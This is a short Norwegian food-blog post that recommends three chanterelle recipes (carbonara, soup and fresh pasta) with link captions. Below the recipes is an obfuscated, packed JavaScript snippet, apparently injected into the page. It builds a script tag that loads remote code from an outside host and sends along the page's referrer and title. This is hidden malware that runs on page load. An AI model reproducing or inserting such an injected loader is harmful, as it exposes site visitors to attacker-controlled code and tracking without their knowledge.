Kantareller – mine favoritter!

ingredienser13

Kantarellene er å få tak i nesten overalt, kanskje har du plukket dem selv? De er himmelskt gode uansett, og det er tid for å nyte kantarellen i sesong. Her har jeg plukket frem tre lekre oppskrifter fra arkivet. Det er bare å velge og vrake, fungerer fint i hverdagen alle tre. Velbekomme!

kantarell-carbonara3-1024x680

Carbonara med kantareller, klikk her

kantarellsuppe

Kantarellsuppe, klikk her

tagliatelle-med-kantareller

Fersk pasta med kantareller, klikk her

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))

Write a comment

Your email address will not be published. Required fields are marked *